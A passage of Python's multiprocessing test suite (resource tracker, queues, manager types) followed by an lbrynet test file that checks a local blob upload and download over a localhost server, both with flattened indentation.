except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
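                # The write end is inherited by the child via pass_fds; the
                # child reports the two resource names back over this pipe
                # before sleeping.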
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
        # The pid should be None in the child process, except for the fork
        # context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
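# Illustrative sketch (not part of the original file): a concrete test module is
# expected to call install_tests_in_module_dict() with its own globals and a start
# method, so the generated With*/setUpModule/tearDownModule names land in that
# module. The module names below are assumptions:
#
#     # hypothetical test_multiprocessing_spawn.py
#     import unittest
#     from test import _test_multiprocessing
#
#     _test_multiprocessing.install_tests_in_module_dict(globals(), 'spawn')
#
#     if __name__ == '__main__':
#         unittest.main()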
|
test_misc.py
|
import os
from hashlib import md5
from twisted.internet import defer, reactor
from twisted.trial import unittest
from lbrynet import conf
from lbrynet.core.server.BlobAvailabilityHandler import BlobAvailabilityHandlerFactory
from lbrynet.core.StreamDescriptor import StreamDescriptorIdentifier
from lbrynet.core.StreamDescriptor import download_sd_blob
from lbrynet.core.PaymentRateManager import OnlyFreePaymentsManager
from lbrynet.core.BlobManager import DiskBlobManager
from lbrynet.core.PeerManager import PeerManager
from lbrynet.core.RateLimiter import RateLimiter
from lbrynet.core.server.BlobRequestHandler import BlobRequestHandlerFactory
from lbrynet.core.server.ServerProtocol import ServerProtocolFactory
from lbrynet.database.storage import SQLiteStorage
from lbrynet.file_manager.EncryptedFileCreator import create_lbry_file
from lbrynet.file_manager.EncryptedFileManager import EncryptedFileManager
from lbrynet.lbry_file.client.EncryptedFileOptions import add_lbry_file_to_sd_identifier
from tests import mocks
from tests.util import mk_db_and_blob_dir, rm_db_and_blob_dir
FakeNode = mocks.Node
FakeWallet = mocks.Wallet
FakePeerFinder = mocks.PeerFinder
FakeAnnouncer = mocks.Announcer
GenFile = mocks.GenFile
test_create_stream_sd_file = mocks.create_stream_sd_file
DummyBlobAvailabilityTracker = mocks.BlobAvailabilityTracker
def init_conf_windows(settings={}):
"""
There is no fork on Windows, so modules are imported freshly
in new processes, and conf needs to be re-initialized for them.
"""
if os.name == 'nt':
original_settings = conf.settings
conf.settings = conf.Config(conf.FIXED_SETTINGS, conf.ADJUSTABLE_SETTINGS)
conf.settings.installation_id = conf.settings.get_installation_id()
conf.settings.update(settings)
class LbryUploader:
def __init__(self, file_size, ul_rate_limit=None):
self.file_size = file_size
self.ul_rate_limit = ul_rate_limit
self.kill_check = None
# these attributes get defined in `start`
self.db_dir = None
self.blob_dir = None
self.wallet = None
self.peer_manager = None
self.rate_limiter = None
self.prm = None
self.storage = None
self.blob_manager = None
self.lbry_file_manager = None
self.server_port = None
@defer.inlineCallbacks
def setup(self):
init_conf_windows()
self.db_dir, self.blob_dir = mk_db_and_blob_dir()
self.wallet = FakeWallet()
self.peer_manager = PeerManager()
self.rate_limiter = RateLimiter()
if self.ul_rate_limit is not None:
self.rate_limiter.set_ul_limit(self.ul_rate_limit)
self.prm = OnlyFreePaymentsManager()
self.storage = SQLiteStorage(self.db_dir)
self.blob_manager = DiskBlobManager(self.blob_dir, self.storage)
self.lbry_file_manager = EncryptedFileManager(FakePeerFinder(5553, self.peer_manager, 1), self.rate_limiter,
self.blob_manager, self.wallet, self.prm, self.storage,
StreamDescriptorIdentifier())
yield self.storage.setup()
yield self.blob_manager.setup()
yield self.lbry_file_manager.setup()
query_handler_factories = {
1: BlobAvailabilityHandlerFactory(self.blob_manager),
2: BlobRequestHandlerFactory(
self.blob_manager, self.wallet,
self.prm,
None),
3: self.wallet.get_wallet_info_query_handler_factory(),
}
server_factory = ServerProtocolFactory(self.rate_limiter,
query_handler_factories,
self.peer_manager)
self.server_port = reactor.listenTCP(5553, server_factory, interface="localhost")
test_file = GenFile(self.file_size, bytes(i for i in range(0, 64, 6)))
lbry_file = yield create_lbry_file(self.blob_manager, self.storage, self.prm, self.lbry_file_manager,
"test_file", test_file)
defer.returnValue(lbry_file.sd_hash)
@defer.inlineCallbacks
def stop(self):
lbry_files = self.lbry_file_manager.lbry_files
for lbry_file in lbry_files:
yield self.lbry_file_manager.delete_lbry_file(lbry_file)
yield self.lbry_file_manager.stop()
yield self.blob_manager.stop()
yield self.storage.stop()
self.server_port.stopListening()
rm_db_and_blob_dir(self.db_dir, self.blob_dir)
if os.path.exists("test_file"):
os.remove("test_file")
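# Illustrative sketch (not part of the original tests): LbryUploader is driven the
# same way TestTransfer below drives it -- setup() publishes "test_file" and returns
# its sd hash, and stop() tears everything down again:
#
#     @defer.inlineCallbacks
#     def _example_upload_cycle():
#         uploader = LbryUploader(5209343)
#         sd_hash = yield uploader.setup()
#         # ... download / verify against sd_hash here ...
#         yield uploader.stop()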
class TestTransfer(unittest.TestCase):
@defer.inlineCallbacks
def setUp(self):
mocks.mock_conf_settings(self)
self.db_dir, self.blob_dir = mk_db_and_blob_dir()
self.wallet = FakeWallet()
self.peer_manager = PeerManager()
self.peer_finder = FakePeerFinder(5553, self.peer_manager, 1)
self.rate_limiter = RateLimiter()
self.prm = OnlyFreePaymentsManager()
self.storage = SQLiteStorage(self.db_dir)
self.blob_manager = DiskBlobManager(self.blob_dir, self.storage)
self.sd_identifier = StreamDescriptorIdentifier()
self.lbry_file_manager = EncryptedFileManager(self.peer_finder, self.rate_limiter,
self.blob_manager, self.wallet, self.prm, self.storage,
self.sd_identifier)
self.uploader = LbryUploader(5209343)
self.sd_hash = yield self.uploader.setup()
yield self.storage.setup()
yield self.blob_manager.setup()
yield self.lbry_file_manager.setup()
yield add_lbry_file_to_sd_identifier(self.sd_identifier)
@defer.inlineCallbacks
def tearDown(self):
yield self.uploader.stop()
lbry_files = self.lbry_file_manager.lbry_files
for lbry_file in lbry_files:
yield self.lbry_file_manager.delete_lbry_file(lbry_file)
yield self.lbry_file_manager.stop()
yield self.blob_manager.stop()
yield self.storage.stop()
rm_db_and_blob_dir(self.db_dir, self.blob_dir)
if os.path.exists("test_file"):
os.remove("test_file")
@defer.inlineCallbacks
def test_lbry_transfer(self):
sd_blob = yield download_sd_blob(
self.sd_hash, self.blob_manager, self.peer_finder, self.rate_limiter, self.prm, self.wallet
)
metadata = yield self.sd_identifier.get_metadata_for_sd_blob(sd_blob)
downloader = yield metadata.factories[0].make_downloader(
metadata, self.prm.min_blob_data_payment_rate, self.prm, self.db_dir, download_mirrors=None
)
yield downloader.start()
with open(os.path.join(self.db_dir, 'test_file'), 'rb') as f:
hashsum = md5()
hashsum.update(f.read())
self.assertEqual(hashsum.hexdigest(), "4ca2aafb4101c1e42235aad24fbb83be")
# TODO: update these
# def test_last_blob_retrieval(self):
# kill_event = Event()
# dead_event_1 = Event()
# blob_hash_queue_1 = Queue()
# blob_hash_queue_2 = Queue()
# fast_uploader = Process(target=start_blob_uploader,
# args=(blob_hash_queue_1, kill_event, dead_event_1, False))
# fast_uploader.start()
# self.server_processes.append(fast_uploader)
# dead_event_2 = Event()
# slow_uploader = Process(target=start_blob_uploader,
# args=(blob_hash_queue_2, kill_event, dead_event_2, True))
# slow_uploader.start()
# self.server_processes.append(slow_uploader)
#
# logging.debug("Testing transfer")
#
# wallet = FakeWallet()
# peer_manager = PeerManager()
# peer_finder = FakePeerFinder(5553, peer_manager, 2)
# hash_announcer = FakeAnnouncer()
# rate_limiter = DummyRateLimiter()
# dht_node = FakeNode(peer_finder=peer_finder, peer_manager=peer_manager, udpPort=4445, peerPort=5553,
# node_id="abcd", externalIP="127.0.0.1")
#
# db_dir, blob_dir = mk_db_and_blob_dir()
# self.session = Session(
# conf.ADJUSTABLE_SETTINGS['data_rate'][1], db_dir=db_dir, node_id="abcd",
# peer_finder=peer_finder, hash_announcer=hash_announcer,
# blob_dir=blob_dir, peer_port=5553, dht_node_port=4445,
# rate_limiter=rate_limiter, wallet=wallet,
# dht_node=dht_node, external_ip="127.0.0.1")
#
# d1 = self.wait_for_hash_from_queue(blob_hash_queue_1)
# d2 = self.wait_for_hash_from_queue(blob_hash_queue_2)
# d = defer.DeferredList([d1, d2], fireOnOneErrback=True)
#
# def get_blob_hash(results):
# self.assertEqual(results[0][1], results[1][1])
# return results[0][1]
#
# d.addCallback(get_blob_hash)
#
# def download_blob(blob_hash):
# prm = self.session.payment_rate_manager
# downloader = StandaloneBlobDownloader(
# blob_hash, self.session.blob_manager, peer_finder, rate_limiter, prm, wallet)
# d = downloader.download()
# return d
#
# def start_transfer(blob_hash):
#
# logging.debug("Starting the transfer")
#
# d = self.session.setup()
# d.addCallback(lambda _: download_blob(blob_hash))
#
# return d
#
# d.addCallback(start_transfer)
#
# def stop(arg):
# if isinstance(arg, Failure):
# logging.debug("Client is stopping due to an error. Error: %s", arg.getTraceback())
# else:
# logging.debug("Client is stopping normally.")
# kill_event.set()
# logging.debug("Set the kill event")
# d1 = self.wait_for_event(dead_event_1, 15)
# d2 = self.wait_for_event(dead_event_2, 15)
# dl = defer.DeferredList([d1, d2])
#
# def print_shutting_down():
# logging.info("Client is shutting down")
#
# dl.addCallback(lambda _: print_shutting_down())
# dl.addCallback(lambda _: rm_db_and_blob_dir(db_dir, blob_dir))
# dl.addCallback(lambda _: arg)
# return dl
#
# d.addBoth(stop)
# return d
#
# def test_double_download(self):
# sd_hash_queue = Queue()
# kill_event = Event()
# dead_event = Event()
# lbry_uploader = LbryUploader(sd_hash_queue, kill_event, dead_event, 5209343)
# uploader = Process(target=lbry_uploader.start)
# uploader.start()
# self.server_processes.append(uploader)
#
# logging.debug("Testing double download")
#
# wallet = FakeWallet()
# peer_manager = PeerManager()
# peer_finder = FakePeerFinder(5553, peer_manager, 1)
# hash_announcer = FakeAnnouncer()
# rate_limiter = DummyRateLimiter()
# sd_identifier = StreamDescriptorIdentifier()
# dht_node = FakeNode(peer_finder=peer_finder, peer_manager=peer_manager, udpPort=4445, peerPort=5553,
# node_id="abcd", externalIP="127.0.0.1")
#
# downloaders = []
#
# db_dir, blob_dir = mk_db_and_blob_dir()
# self.session = Session(conf.ADJUSTABLE_SETTINGS['data_rate'][1], db_dir=db_dir,
# node_id="abcd", peer_finder=peer_finder, dht_node_port=4445,
# hash_announcer=hash_announcer, blob_dir=blob_dir, peer_port=5553,
# rate_limiter=rate_limiter, wallet=wallet,
# external_ip="127.0.0.1", dht_node=dht_node)
#
# self.lbry_file_manager = EncryptedFileManager(self.session, sd_identifier)
#
# @defer.inlineCallbacks
# def make_downloader(metadata, prm):
# factories = metadata.factories
# downloader = yield factories[0].make_downloader(metadata, prm.min_blob_data_payment_rate, prm, db_dir)
# defer.returnValue(downloader)
#
# @defer.inlineCallbacks
# def download_file(sd_hash):
# prm = self.session.payment_rate_manager
# sd_blob = yield download_sd_blob(self.session, sd_hash, prm)
# metadata = yield sd_identifier.get_metadata_for_sd_blob(sd_blob)
# downloader = yield make_downloader(metadata, prm)
# downloaders.append(downloader)
# yield downloader.start()
# defer.returnValue(downloader)
#
# def check_md5_sum():
# f = open(os.path.join(db_dir, 'test_file'))
# hashsum = md5()
# hashsum.update(f.read())
# self.assertEqual(hashsum.hexdigest(), "4ca2aafb4101c1e42235aad24fbb83be")
#
# def delete_lbry_file(downloader):
# logging.debug("deleting the file")
# return self.lbry_file_manager.delete_lbry_file(downloader)
#
# def check_lbry_file(downloader):
# d = downloader.status()
#
# def check_status_report(status_report):
# self.assertEqual(status_report.num_known, status_report.num_completed)
# self.assertEqual(status_report.num_known, 3)
#
# d.addCallback(check_status_report)
# return d
#
# @defer.inlineCallbacks
# def start_transfer(sd_hash):
# # download a file, delete it, and download it again
#
# logging.debug("Starting the transfer")
# yield self.session.setup()
# yield add_lbry_file_to_sd_identifier(sd_identifier)
# yield self.lbry_file_manager.setup()
# downloader = yield download_file(sd_hash)
# yield check_md5_sum()
# yield check_lbry_file(downloader)
